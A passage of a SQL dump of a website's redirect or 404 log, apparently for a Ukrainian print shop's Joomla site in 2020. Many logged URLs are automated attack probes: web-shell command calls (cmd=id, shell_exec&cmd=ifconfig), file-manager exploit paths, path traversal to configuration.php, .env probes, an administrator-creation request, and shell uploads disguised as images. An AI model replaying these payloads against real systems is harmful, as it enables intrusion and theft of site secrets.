01:12:15','0000-00-00 00:00:00',301),(18046,'https://ekvatorprint.com.ua/ajax/render/widget_tabbedcontainer_tab_panel',NULL,'','',1,0,'2020-08-31 06:38:53','0000-00-00 00:00:00',301),(18047,'https://ekvatorprint.com.ua/forum/ajax/render/widget_tabbedcontainer_tab_panel',NULL,'','',1,0,'2020-08-31 08:03:06','0000-00-00 00:00:00',301),(18048,'https://ekvatorprint.com.ua/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'','',25,0,'2020-09-02 19:20:35','0000-00-00 00:00:00',301),(18049,'https://ekvatorprint.com.ua/wp-content/plugins/wp-file-manager/lib/files/x.php?cmd=id',NULL,'','',2,0,'2020-09-03 09:19:49','0000-00-00 00:00:00',301),(18050,'https://ekvatorprint.com.ua/blog/wp-content/plugins/wp-file-manager/lib/files/x.php?cmd=id',NULL,'','',1,0,'2020-09-03 14:57:16','0000-00-00 00:00:00',301),(18051,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/wp-file-manager/lib/files/x.php?cmd=id',NULL,'','',1,0,'2020-09-03 15:11:26','0000-00-00 00:00:00',301),(18052,'https://ekvatorprint.com.ua/wp-content/plugins/wp-file-manager/lib/files/xxx.php',NULL,'','',1,0,'2020-09-05 07:15:37','0000-00-00 00:00:00',301),(18053,'https://ekvatorprint.com.ua/wp-content/plugins/wp-file-manager/lib/files/x.php?cmd=whoami',NULL,'','',2,0,'2020-09-05 07:16:09','0000-00-00 00:00:00',301),(18054,'https://ekvatorprint.com.ua/print-photo/templates/gk_ilife/favicon.ico',NULL,'','',3,0,'2020-09-06 16:44:39','0000-00-00 00:00:00',301),(18055,'https://ekvatorprint.com.ua/favicon.png',NULL,'','',2,0,'2020-09-07 09:43:41','0000-00-00 00:00:00',301),(18056,'https://ekvatorprint.com.ua/app/system/include/class/phpqrcode/tools/merge.sh',NULL,'','',1,0,'2020-09-07 17:53:37','0000-00-00 00:00:00',301),(18057,'https://ekvatorprint.com.ua/index.php/component/k2/itemlist/',NULL,'https://ekvatorprint.com.ua/index.php/component/k2/itemlist/','',2,0,'2020-09-08 16:57:26','0000-00-00 00:00:00',301),(18058,'https://ekvatorprint.com.ua/ups.php',NULL,'http://site.ru','',32,0,'2020-09-09 18:26:31','0000-00-00 00:00:00',301),(18059,'https://ekvatorprint.com.ua/87/index.php',NULL,'http://site.ru','',4,0,'2020-09-09 19:41:45','0000-00-00 00:00:00',301),(18060,'https://ekvatorprint.com.ua/87/5.php',NULL,'http://site.ru','',9,0,'2020-09-10 07:39:45','0000-00-00 00:00:00',301),(18061,'https://ekvatorprint.com.ua/-/~/code87/5.php',NULL,'http://site.ru','',4,0,'2020-09-10 08:27:57','0000-00-00 00:00:00',301),(18062,'https://ekvatorprint.com.ua/wp-trackback.php',NULL,'http://site.ru','',2,0,'2020-09-10 10:23:45','0000-00-00 00:00:00',301),(18063,'https://ekvatorprint.com.ua/wp-mail.php',NULL,'http://site.ru','',4,0,'2020-09-10 17:03:24','0000-00-00 00:00:00',301),(18064,'https://ekvatorprint.com.ua/media-admin.php',NULL,'http://site.ru','',22,0,'2020-09-11 01:22:34','0000-00-00 00:00:00',301),(18065,'https://ekvatorprint.com.ua/wp-signup.php',NULL,'http://site.ru','',3,0,'2020-09-11 01:29:20','0000-00-00 00:00:00',301),(18066,'https://ekvatorprint.com.ua/plugins/editors/tinymce/field/index.php',NULL,'http://site.ru','',6,0,'2020-09-11 11:13:58','0000-00-00 00:00:00',301),(18067,'https://ekvatorprint.com.ua/trebovaniyahttp:/microsoft.office-publisher.ideaprog.download',NULL,'','',1,0,'2020-09-11 14:53:57','0000-00-00 00:00:00',301),(18068,'https://ekvatorprint.com.ua/wp_asx.php.suspected',NULL,'http://site.ru','',3,0,'2020-09-11 19:30:31','0000-00-00 00:00:00',301),(18069,'https://ekvatorprint.com.ua/wp-cron.php',NULL,'http://site.ru','',5,0,'2020-09-11 21:41:48','0000-00-00 00:00:00',301),(18070,'https://ekvatorprint.com.ua/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php',NULL,'www.google.com','',3,0,'2020-09-13 10:57:22','0000-00-00 00:00:00',301),(18071,'https://ekvatorprint.com.ua/images/favicons/android_2/192x192.png',NULL,'','',3,0,'2020-09-14 12:10:41','0000-00-00 00:00:00',301),(18072,'https://ekvatorprint.com.ua/images/favicons/android_2/144x144.png',NULL,'','',3,0,'2020-09-14 12:10:41','0000-00-00 00:00:00',301),(18073,'https://ekvatorprint.com.ua/images/favicons/android_2/128x128.png',NULL,'','',3,0,'2020-09-14 12:10:41','0000-00-00 00:00:00',301),(18074,'https://ekvatorprint.com.ua/images/favicons/android_2/96x96.png',NULL,'','',3,0,'2020-09-14 12:10:41','0000-00-00 00:00:00',301),(18075,'https://ekvatorprint.com.ua/images/favicons/android_2/72x72.png',NULL,'','',3,0,'2020-09-14 12:10:41','0000-00-00 00:00:00',301),(18076,'https://ekvatorprint.com.ua/images/favicons/android_2/48x48.png',NULL,'','',3,0,'2020-09-14 12:10:42','0000-00-00 00:00:00',301),(18077,'https://ekvatorprint.com.ua//ajax/render/widget_php',NULL,'','',1,0,'2020-09-19 22:48:46','0000-00-00 00:00:00',301),(18078,'https://ekvatorprint.com.ua//index.php?routestring=ajax/render/widget_php',NULL,'','',1,0,'2020-09-19 22:48:46','0000-00-00 00:00:00',301),(18079,'https://ekvatorprint.com.ua//forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)',NULL,'','',1,0,'2020-09-19 22:48:48','0000-00-00 00:00:00',301),(18080,'https://ekvatorprint.com.ua/forum//ajax/render/widget_php',NULL,'','',1,0,'2020-09-19 22:48:48','0000-00-00 00:00:00',301),(18081,'https://ekvatorprint.com.ua/forum//index.php?routestring=ajax/render/widget_php',NULL,'','',1,0,'2020-09-19 22:48:49','0000-00-00 00:00:00',301),(18082,'https://ekvatorprint.com.ua/forum//forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)',NULL,'','',1,0,'2020-09-19 22:48:50','0000-00-00 00:00:00',301),(18083,'https://ekvatorprint.com.ua/forums//ajax/render/widget_php',NULL,'','',1,0,'2020-09-19 22:48:51','0000-00-00 00:00:00',301),(18084,'https://ekvatorprint.com.ua/forums//index.php?routestring=ajax/render/widget_php',NULL,'','',1,0,'2020-09-19 22:48:51','0000-00-00 00:00:00',301),(18085,'https://ekvatorprint.com.ua/forums//forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)',NULL,'','',1,0,'2020-09-19 22:48:52','0000-00-00 00:00:00',301),(18086,'https://ekvatorprint.com.ua/vb//ajax/render/widget_php',NULL,'','',1,0,'2020-09-19 22:48:53','0000-00-00 00:00:00',301),(18087,'https://ekvatorprint.com.ua/vb//index.php?routestring=ajax/render/widget_php',NULL,'','',1,0,'2020-09-19 22:48:53','0000-00-00 00:00:00',301),(18088,'https://ekvatorprint.com.ua/vb//forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)',NULL,'','',1,0,'2020-09-19 22:48:54','0000-00-00 00:00:00',301),(18089,'https://ekvatorprint.com.ua/board//ajax/render/widget_php',NULL,'','',1,0,'2020-09-19 22:48:55','0000-00-00 00:00:00',301),(18090,'https://ekvatorprint.com.ua/board//index.php?routestring=ajax/render/widget_php',NULL,'','',1,0,'2020-09-19 22:48:55','0000-00-00 00:00:00',301),(18091,'https://ekvatorprint.com.ua/board//forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)',NULL,'','',1,0,'2020-09-19 22:48:56','0000-00-00 00:00:00',301),(18092,'https://ekvatorprint.com.ua/boards//ajax/render/widget_php',NULL,'','',1,0,'2020-09-19 22:48:57','0000-00-00 00:00:00',301),(18093,'https://ekvatorprint.com.ua/boards//index.php?routestring=ajax/render/widget_php',NULL,'','',1,0,'2020-09-19 22:48:57','0000-00-00 00:00:00',301),(18094,'https://ekvatorprint.com.ua/boards//forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)',NULL,'','',1,0,'2020-09-19 22:48:58','0000-00-00 00:00:00',301),(18095,'https://ekvatorprint.com.ua/f//ajax/render/widget_php',NULL,'','',1,0,'2020-09-19 22:48:59','0000-00-00 00:00:00',301),(18096,'https://ekvatorprint.com.ua/f//index.php?routestring=ajax/render/widget_php',NULL,'','',1,0,'2020-09-19 22:48:59','0000-00-00 00:00:00',301),(18097,'https://ekvatorprint.com.ua/f//forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)',NULL,'','',1,0,'2020-09-19 22:49:00','0000-00-00 00:00:00',301),(18098,'https://ekvatorprint.com.ua/wp-json',NULL,'','',1,0,'2020-09-20 05:39:58','0000-00-00 00:00:00',301),(18099,'https://ekvatorprint.com.ua///wp-login.php',NULL,'','',2,0,'2020-09-20 21:51:15','0000-00-00 00:00:00',301),(18100,'https://ekvatorprint.com.ua//wp/',NULL,'','',1,0,'2020-09-20 21:52:17','0000-00-00 00:00:00',301),(18101,'https://ekvatorprint.com.ua//wp//wp-login.php',NULL,'','',1,0,'2020-09-20 21:53:03','0000-00-00 00:00:00',301),(18102,'https://ekvatorprint.com.ua//wordpress/',NULL,'','',1,0,'2020-09-20 21:53:46','0000-00-00 00:00:00',301),(18103,'https://ekvatorprint.com.ua//wordpress//wp-login.php',NULL,'','',1,0,'2020-09-20 21:54:30','0000-00-00 00:00:00',301),(18104,'https://ekvatorprint.com.ua/undefinedplugins/system/jcemediabox/themes/standard/tooltip.html',NULL,'https://ekvatorprint.com.ua/trebovaniya','',4,0,'2020-09-21 14:47:35','0000-00-00 00:00:00',301),(18105,'https://ekvatorprint.com.ua/undefinedplugins/system/jcemediabox/themes/standard/popup.html',NULL,'https://ekvatorprint.com.ua/trebovaniya','',4,0,'2020-09-21 14:47:35','0000-00-00 00:00:00',301),(18106,'https://ekvatorprint.com.ua/images/favicon.ico',NULL,'','',4,0,'2020-09-21 18:04:43','0000-00-00 00:00:00',301),(18107,'https://ekvatorprint.com.ua/giftcertificates.php',NULL,'','',1,0,'2020-09-24 02:58:41','0000-00-00 00:00:00',301),(18108,'https://ekvatorprint.com.ua/v1/.env',NULL,'','',1,0,'2020-09-24 23:09:33','0000-00-00 00:00:00',301),(18109,'https://ekvatorprint.com.ua/lib/.env',NULL,'','',2,0,'2020-09-24 23:09:42','0000-00-00 00:00:00',301),(18110,'https://ekvatorprint.com.ua/cron/.env',NULL,'','',1,0,'2020-09-24 23:09:42','0000-00-00 00:00:00',301),(18111,'https://ekvatorprint.com.ua/database/.env',NULL,'','',36,0,'2020-09-24 23:09:42','0000-00-00 00:00:00',301),(18112,'https://ekvatorprint.com.ua/uploads/.env',NULL,'','',1,0,'2020-09-24 23:09:43','0000-00-00 00:00:00',301),(18113,'https://ekvatorprint.com.ua////wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'','',1,0,'2020-09-25 21:57:12','0000-00-00 00:00:00',301),(18114,'https://ekvatorprint.com.ua////wp-content/plugins/wp-file-manager/lib/files/admin.php',NULL,'','',1,0,'2020-09-25 21:58:14','0000-00-00 00:00:00',301),(18115,'https://ekvatorprint.com.ua//ajax/api/content_infraction/getindexablecontent',NULL,'','',2,0,'2020-09-26 12:20:54','0000-00-00 00:00:00',301),(18116,'https://ekvatorprint.com.ua/forum//ajax/api/content_infraction/getindexablecontent',NULL,'','',2,0,'2020-09-26 12:20:54','0000-00-00 00:00:00',301),(18117,'https://ekvatorprint.com.ua/forums//ajax/api/content_infraction/getindexablecontent',NULL,'','',2,0,'2020-09-26 12:20:55','0000-00-00 00:00:00',301),(18118,'https://ekvatorprint.com.ua/vb//ajax/api/content_infraction/getindexablecontent',NULL,'','',2,0,'2020-09-26 12:20:55','0000-00-00 00:00:00',301),(18119,'https://ekvatorprint.com.ua/board//ajax/api/content_infraction/getindexablecontent',NULL,'','',2,0,'2020-09-26 12:20:56','0000-00-00 00:00:00',301),(18120,'https://ekvatorprint.com.ua/boards//ajax/api/content_infraction/getindexablecontent',NULL,'','',2,0,'2020-09-26 12:20:56','0000-00-00 00:00:00',301),(18121,'https://ekvatorprint.com.ua/f//ajax/api/content_infraction/getindexablecontent',NULL,'','',2,0,'2020-09-26 12:20:57','0000-00-00 00:00:00',301),(18122,'https://ekvatorprint.com.ua//.env',NULL,'','',2,0,'2020-09-26 18:28:23','0000-00-00 00:00:00',301),(18123,'https://ekvatorprint.com.ua/wp-content/plugins/wp-file-manager/lib/files/',NULL,'http://www.google.com/','',2,0,'2020-09-27 11:00:55','0000-00-00 00:00:00',301),(18124,'https://ekvatorprint.com.ua//vendor/composer/installed.json',NULL,'','',1,0,'2020-09-27 15:23:24','0000-00-00 00:00:00',301),(18125,'https://ekvatorprint.com.ua/tmp/index.php',NULL,'','',1,0,'2020-09-28 18:58:04','0000-00-00 00:00:00',301),(18126,'https://ekvatorprint.com.ua/index.php/component/k2/itemlist',NULL,'','',2,0,'2020-09-29 11:12:15','0000-00-00 00:00:00',301),(18127,'https://ekvatorprint.com.ua//index.php?option=com_k2&view=itemlist&task=user&id=62:administrator',NULL,'','',1,0,'2020-09-29 13:39:44','0000-00-00 00:00:00',301),(18128,'https://ekvatorprint.com.ua/vendor/phpunit/phpunit/phpunit.xml',NULL,'','',10,0,'2020-10-02 01:49:00','0000-00-00 00:00:00',301),(18129,'https://ekvatorprint.com.ua//wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'','',6,0,'2020-10-04 07:21:53','0000-00-00 00:00:00',301),(18130,'https://ekvatorprint.com.ua//wp-content/plugins/wp-file-manager/lib/files/wpadmind.php',NULL,'','',1,0,'2020-10-04 07:22:08','0000-00-00 00:00:00',301),(18131,'https://ekvatorprint.com.ua//wp-content/plugins/wp-file-manager/lib/files/wpadmin.php?act=ul',NULL,'','',1,0,'2020-10-04 07:22:17','0000-00-00 00:00:00',301),(18132,'https://ekvatorprint.com.ua//wp-content/plugins/wp-file-manager/lib/files/uladmin.php?act=ul',NULL,'','',1,0,'2020-10-04 07:22:27','0000-00-00 00:00:00',301),(18133,'https://ekvatorprint.com.ua///wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'','',1,0,'2020-10-04 07:22:41','0000-00-00 00:00:00',301),(18134,'https://ekvatorprint.com.ua///wp-content/plugins/wp-file-manager/lib/files/admin.php',NULL,'','',1,0,'2020-10-04 07:23:06','0000-00-00 00:00:00',301),(18135,'https://ekvatorprint.com.ua//wp-content/plugins/wp-file-manager/lib/files/badmin.php',NULL,'','',1,0,'2020-10-04 07:23:25','0000-00-00 00:00:00',301),(18136,'https://ekvatorprint.com.ua/wp-content/plugins/wp-file-manager/lib/files/wpadmind.php',NULL,'','',1,0,'2020-10-04 07:24:17','0000-00-00 00:00:00',301),(18137,'https://ekvatorprint.com.ua/wp-content/plugins/wp-file-manager/lib/files/uladmin.php?act=ul',NULL,'','',1,0,'2020-10-04 07:25:12','0000-00-00 00:00:00',301),(18138,'https://ekvatorprint.com.ua/wp-content/plugins/wp-file-manager/lib/files/wpadmin.php?act=ul',NULL,'','',1,0,'2020-10-04 07:25:38','0000-00-00 00:00:00',301),(18139,'https://ekvatorprint.com.ua/wp-content/plugins/wp-file-manager/lib/files/admin.php',NULL,'','',1,0,'2020-10-04 07:26:21','0000-00-00 00:00:00',301),(18140,'https://ekvatorprint.com.ua/wp-content/plugins/wp-file-manager/lib/files/badmin.php',NULL,'','',1,0,'2020-10-04 07:26:56','0000-00-00 00:00:00',301),(18141,'https://ekvatorprint.com.ua/https://ekvatorprint.com.ua/',NULL,'','',30,0,'2020-10-05 17:42:19','0000-00-00 00:00:00',301),(18142,'https://ekvatorprint.com.ua/editdirect/ajax-upload.php?act=ajax',NULL,'','',1,0,'2020-10-05 23:35:28','0000-00-00 00:00:00',301),(18143,'https://ekvatorprint.com.ua/wp-includes/js/wpdialog.js',NULL,'','',1,0,'2020-10-06 15:53:04','0000-00-00 00:00:00',301),(18144,'https://ekvatorprint.com.ua/wp-content/plugins/wp-file-manager/readme.txt',NULL,'','',2,0,'2020-10-08 13:14:54','0000-00-00 00:00:00',301),(18145,'https://ekvatorprint.com.ua/images/style2/menu_bg_active.png',NULL,'https://ekvatorprint.com.ua/contacts','',11,0,'2020-10-08 17:35:39','0000-00-00 00:00:00',301),(18146,'https://ekvatorprint.com.ua/wp-content/plugins/wp-file-manager/lib/files/badmin1.php',NULL,'','',2,0,'2020-10-12 23:19:18','0000-00-00 00:00:00',301),(18147,'https://ekvatorprint.com.ua/nette.micro?callback=shell_exec&cmd=ifconfig',NULL,'','',2,0,'2020-10-12 23:19:55','0000-00-00 00:00:00',301),(18148,'https://ekvatorprint.com.ua////nette.micro?callback=shell_exec&cmd=ifconfig',NULL,'','',1,0,'2020-10-13 15:00:40','0000-00-00 00:00:00',301),(18149,'https://ekvatorprint.com.ua/moz-extension//oaaiakcplphnankiegbjjfkdjhaelkgp/fonts/new_channel_font.woff',NULL,'https://ekvatorprint.com.ua/printing-on-canvas','',1,0,'2020-10-13 16:33:28','0000-00-00 00:00:00',301),(18150,'https://ekvatorprint.com.ua/moz-extension//oaaiakcplphnankiegbjjfkdjhaelkgp/fonts/new_channel_font.ttf',NULL,'https://ekvatorprint.com.ua/printing-on-canvas','',1,0,'2020-10-13 16:33:28','0000-00-00 00:00:00',301),(18151,'https://ekvatorprint.com.ua/sitemap.txt',NULL,'http://ekvatorprint.com.ua/sitemap.txt','',40,0,'2020-10-14 06:39:30','0000-00-00 00:00:00',301),(18152,'https://ekvatorprint.com.ua/magmi/conf/magmi.ini',NULL,'','',4,0,'2020-10-14 23:44:10','0000-00-00 00:00:00',301),(18153,'https://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/upload/editor_plugin.js',NULL,'','',2,0,'2020-10-16 23:32:18','0000-00-00 00:00:00',301),(18154,'https://ekvatorprint.com.ua/license.txt',NULL,'','',6,0,'2020-10-16 23:39:01','0000-00-00 00:00:00',301),(18155,'https://ekvatorprint.com.ua/wp-json/trx_addons/v2/get/sc_layout?sc=wp_insert_user&role=administrator&user_login=',NULL,'','',2,0,'2020-10-17 14:34:10','0000-00-00 00:00:00',301),(18156,'https://ekvatorprint.com.ua/images/style2/menu_bg_hover.png',NULL,'https://ekvatorprint.com.ua/contacts','',2,0,'2020-10-18 15:07:19','0000-00-00 00:00:00',301),(18157,'https://ekvatorprint.com.ua/include/ckeditor/config.js',NULL,'','',1,0,'2020-10-19 05:31:21','0000-00-00 00:00:00',301),(18158,'https://ekvatorprint.com.ua/wp-admin/admin-ajax.php',NULL,'','',49,0,'2020-10-19 23:06:13','0000-00-00 00:00:00',301),(18159,'https://ekvatorprint.com.ua/wp-track.php',NULL,'','',1,0,'2020-10-19 23:06:14','0000-00-00 00:00:00',301),(18160,'https://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist',NULL,'https://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist','',1,0,'2020-10-21 05:45:25','0000-00-00 00:00:00',301),(18161,'https://ekvatorprint.com.ua/images/gang.txt',NULL,'','',6,0,'2020-10-21 22:51:00','0000-00-00 00:00:00',301),(18162,'https://ekvatorprint.com.ua/ndex.php/wp-json/articulate/v1/upload-data',NULL,'','',1,0,'2020-10-23 04:04:48','0000-00-00 00:00:00',301),(18163,'https://ekvatorprint.com.ua/vendor/composer/installed.json',NULL,'','',6,0,'2020-10-23 20:13:12','0000-00-00 00:00:00',301),(18164,'https://ekvatorprint.com.ua/components/com_hdflvplayer/js/mootools-core.js',NULL,'','',1,0,'2020-10-24 23:27:38','0000-00-00 00:00:00',301),(18165,'https://ekvatorprint.com.ua/wp-content/tinyfilemanager.php',NULL,'','',1,0,'2020-10-25 13:58:54','0000-00-00 00:00:00',301),(18166,'https://ekvatorprint.com.ua/mi.php',NULL,'','',1,0,'2020-10-28 01:50:08','0000-00-00 00:00:00',301),(18167,'https://ekvatorprint.com.ua/ol.php',NULL,'','',1,0,'2020-10-28 01:50:10','0000-00-00 00:00:00',301),(18168,'https://ekvatorprint.com.ua/wp-admin/ol.php',NULL,'','',1,0,'2020-10-28 01:50:14','0000-00-00 00:00:00',301),(18169,'https://ekvatorprint.com.ua/seller.php',NULL,'','',1,0,'2020-10-28 01:50:18','0000-00-00 00:00:00',301),(18170,'https://ekvatorprint.com.ua/wp-content/plugins/beast3x/wso.php',NULL,'','',1,0,'2020-10-28 01:50:26','0000-00-00 00:00:00',301),(18171,'https://ekvatorprint.com.ua/chitoge.php?chitoge',NULL,'','',2,0,'2020-10-28 01:50:39','0000-00-00 00:00:00',301),(18172,'https://ekvatorprint.com.ua/wp-control.php',NULL,'','',1,0,'2020-10-28 01:50:55','0000-00-00 00:00:00',301),(18173,'https://ekvatorprint.com.ua/m4r1.php',NULL,'','',1,0,'2020-10-28 01:51:02','0000-00-00 00:00:00',301),(18174,'https://ekvatorprint.com.ua/vendor/i.php',NULL,'','',1,0,'2020-10-28 01:51:05','0000-00-00 00:00:00',301),(18175,'https://ekvatorprint.com.ua/sites/default/files/vuln.php',NULL,'','',1,0,'2020-10-28 01:51:16','0000-00-00 00:00:00',301),(18176,'https://ekvatorprint.com.ua/vendor/phpunit/phpunit/src/util/php/king.php',NULL,'','',1,0,'2020-10-28 01:51:26','0000-00-00 00:00:00',301),(18177,'https://ekvatorprint.com.ua/vuln.html',NULL,'','',1,0,'2020-10-28 01:51:36','0000-00-00 00:00:00',301),(18178,'https://ekvatorprint.com.ua/wp-content/plugins/apikey/apikey.php',NULL,'','',14,0,'2020-10-28 12:44:29','0000-00-00 00:00:00',301),(18179,'https://ekvatorprint.com.ua/wp-content/plugins/apikey/cursed.php',NULL,'','',1,0,'2020-10-28 12:44:49','0000-00-00 00:00:00',301),(18180,'https://ekvatorprint.com.ua/ekvatorprint.sql.rar',NULL,'','',1,0,'2020-10-28 21:38:03','0000-00-00 00:00:00',301),(18181,'https://ekvatorprint.com.ua/wp-content/plugins/superstorefinder-wp/js/docs.js',NULL,'','',1,0,'2020-10-29 14:36:20','0000-00-00 00:00:00',301),(18182,'https://ekvatorprint.com.ua/wp-content/plugins/superlogoshowcase-wp/js/docs.js',NULL,'','',1,0,'2020-10-29 14:36:29','0000-00-00 00:00:00',301),(18183,'https://ekvatorprint.com.ua/wp-content/plugins/super-interactive-maps/js/docs.js',NULL,'','',1,0,'2020-10-29 14:36:36','0000-00-00 00:00:00',301),(18184,'https://ekvatorprint.com.ua/printing-on-canvas  отзывы',NULL,'','',1,0,'2020-10-30 16:20:52','0000-00-00 00:00:00',301),(18185,'https://ekvatorprint.com.ua/index.php?option=com_fabrik&controller=./configuration.php',NULL,'','',2,0,'2020-10-31 05:54:23','0000-00-00 00:00:00',301),(18186,'https://ekvatorprint.com.ua/index.php?option=com_rsfiles&task=download&path=./configuration.php',NULL,'','',2,0,'2020-10-31 05:54:24','0000-00-00 00:00:00',301),(18187,'https://ekvatorprint.com.ua/index.php?option=com_adsmanager&mosconfig_absolute_path=configuration.php',NULL,'','',2,0,'2020-10-31 05:54:24','0000-00-00 00:00:00',301),(18188,'https://ekvatorprint.com.ua/banner-printing/wp-login.php',NULL,'','',63,0,'2020-10-31 07:38:34','0000-00-00 00:00:00',301),(18189,'https://ekvatorprint.com.ua/media/com_acym/css/widget.min.css',NULL,'','',1,0,'2020-10-31 10:16:52','0000-00-00 00:00:00',301),(18190,'https://ekvatorprint.com.ua/media/com_acym/js/global.min.js',NULL,'','',1,0,'2020-11-01 23:21:16','0000-00-00 00:00:00',301),(18191,'https://ekvatorprint.com.ua/media/com_acym/upload/socials/xxxdddshell.php',NULL,'','',3,0,'2020-11-01 23:39:05','0000-00-00 00:00:00',301),(18192,'https://ekvatorprint.com.ua/components/com_acym/acym.php',NULL,'','',6,0,'2020-11-02 02:19:36','0000-00-00 00:00:00',301),(18193,'https://ekvatorprint.com.ua/index.php?option=com_easyshop&task=ajax.loadimage&file=li9jb25mawd1cmf0aw9ulnboca==',NULL,'','',2,0,'2020-11-02 23:25:10','0000-00-00 00:00:00',301),(18194,'https://ekvatorprint.com.ua/index.php?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php',NULL,'','',7,0,'2020-11-02 23:25:10','0000-00-00 00:00:00',301),(18195,'https://ekvatorprint.com.ua/index.php?option=com_jifile&task=filesystem.download&filename=configuration.php',NULL,'','',2,0,'2020-11-02 23:25:11','0000-00-00 00:00:00',301),(18196,'https://ekvatorprint.com.ua/index.php?option=com_k2&view=media&task=connector&cmd=file&target=l1_y29uzmlndxjhdglvbi5waha=&download=1',NULL,'','',2,0,'2020-11-02 23:25:12','0000-00-00 00:00:00',301),(18197,'https://ekvatorprint.com.ua/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=configuration.php',NULL,'','',2,0,'2020-11-02 23:25:12','0000-00-00 00:00:00',301),(18198,'https://ekvatorprint.com.ua/plugins/content/fsave/download.php?filename=../../../configuration.php',NULL,'','',2,0,'2020-11-02 23:25:12','0000-00-00 00:00:00',301),(18199,'https://ekvatorprint.com.ua/index.php?option=com_helpdeskpro&task=ticket.download_attachment&filename=configuration.php&original_filename=mp.exe',NULL,'','',2,0,'2020-11-02 23:25:13','0000-00-00 00:00:00',301),(18200,'https://ekvatorprint.com.ua/wiki/',NULL,'','',1,0,'2020-11-03 18:58:01','0000-00-00 00:00:00',301),(18201,'https://ekvatorprint.com.ua/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload',NULL,'','',2,0,'2020-11-03 23:52:49','0000-00-00 00:00:00',301),(18202,'https://ekvatorprint.com.ua/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image',NULL,'','',62,0,'2020-11-04 01:48:02','0000-00-00 00:00:00',301),(18203,'https://ekvatorprint.com.ua/images/gmapfp/xsamxadoo.php.jpg',NULL,'','',11,0,'2020-11-04 01:48:03','0000-00-00 00:00:00',301),(18204,'https://ekvatorprint.com.ua/images/gmapfp/xsamxadoo.php.jpeg',NULL,'','',5,0,'2020-11-04 01:48:04','0000-00-00 00:00:00',301),(18205,'https://ekvatorprint.com.ua/images/gmapfp/xsamxadoo.php.png',NULL,'','',6,0,'2020-11-04 01:48:06','0000-00-00 00:00:00',301),(18206,'https://ekvatorprint.com.ua/images/gmapfp/xsamxadoo.php.gif',NULL,'','',5,0,'2020-11-04 01:48:07','0000-00-00 00:00:00',301),(18207,'https://ekvatorprint.com.ua/images/gmapfp/xsamxadoo.phtml.jpg',NULL,'','',5,0,'2020-11-04 01:48:11','0000-00-00 00:00:00',301),(18208,'https://ekvatorprint.com.ua/images/gmapfp/xsamxadoo.php5.jpg',NULL,'','',5,0,'2020-11-04 01:48:12','0000-00-00 00:00:00',301),(18209,'https://ekvatorprint.com.ua/images/gmapfp/xsamxadoo.php6.jpg',NULL,'','',5,0,'2020-11-04 01:48:14','0000-00-00 00:00:00',301),(18210,'https://ekvatorprint.com.ua/images/gmapfp/xsamxadoo.php',NULL,'','',5,0,'2020-11-04 01:48:15','0000-00-00 00:00:00',301),(18211,'https://ekvatorprint.com.ua/images/gmapfp/xsamxadoo.phtml',NULL,'','',5,0,'2020-11-04 01:48:17','0000-00-00 00:00:00',301),(18212,'https://ekvatorprint.com.ua/images/gmapfp/xsamxadoo.php5',NULL,'','',5,0,'2020-11-04 01:48:18','0000-00-00 00:00:00',301),(18213,'https://ekvatorprint.com.ua/images/gmapfp/xsamxadoo.php6',NULL,'','',5,0,'2020-11-04 01:48:20','0000-00-00 00:00:00',301),(18214,'https://ekvatorprint.com.ua/media/com_acym/css/libraries/foundation_email.min.css',NULL,'','',2,0,'2020-11-04 04:16:34','0000-00-00 00:00:00',301),(18215,'https://ekvatorprint.com.ua/images/gmapfp/406.php.png',NULL,'','',1,0,'2020-11-04 11:35:06','0000-00-00 00:00:00',301),(18216,'https://ekvatorprint.com.ua/images/gmapfp/mjzrh.php.jpg',NULL,'','',2,0,'2020-11-05 03:59:35','0000-00-00 00:00:00',301),(18217,'https://ekvatorprint.com.ua/media/k2/assets/vendors/studio-42/elfinder/php/connector.minimal.php',NULL,'http://www.google.com/','',1,0,'2020-11-05 06:47:44','0000-00-00 00:00:00',301),(18218,'https://ekvatorprint.com.ua/mambots/editors/tinymce.xml',NULL,'','',2,0,'2020-11-05 06:59:33','0000-00-00 00:00:00',301),(18219,'https://ekvatorprint.com.ua/modules/mod_wrapper.xml',NULL,'','',2,0,'2020-11-05 06:59:38','0000-00-00 00:00:00',301),(18220,'https://ekvatorprint.com.ua/components/com_content/views/section/tmpl/blog.xml',NULL,'','',2,0,'2020-11-05 06:59:44','0000-00-00 00:00:00',301),(18221,'https://ekvatorprint.com.ua/plugins/editors/tinymce.xml',NULL,'','',2,0,'2020-11-05 06:59:46','0000-00-00 00:00:00',301),(18222,'https://ekvatorprint.com.ua/components/com_contact/metadata.xml',NULL,'','',2,0,'2020-11-05 06:59:49','0000-00-00 00:00:00',301),(18223,'https://ekvatorprint.com.ua/plugins/system/mtupgrade.xml',NULL,'','',2,0,'2020-11-05 06:59:51','0000-00-00 00:00:00',301),(18224,'https://ekvatorprint.com.ua/joomla.xml',NULL,'','',3,0,'2020-11-05 06:59:53','0000-00-00 00:00:00',301),(18225,'https://ekvatorprint.com.ua/wp-content/plugins/simple-file-list/readme.txt',NULL,'','',1,0,'2020-11-06 07:17:22','0000-00-00 00:00:00',301),(18226,'https://ekvatorprint.com.ua/cache/wp_wrong_datlib.php',NULL,'','',2,0,'2020-11-08 19:44:10','0000-00-00 00:00:00',301),(18227,'https://ekvatorprint.com.ua/vendor',NULL,'','',2,0,'2020-11-10 05:01:17','0000-00-00 00:00:00',301),(18228,'https://ekvatorprint.com.ua/forums',NULL,'','',2,0,'2020-11-10 05:02:09','0000-00-00 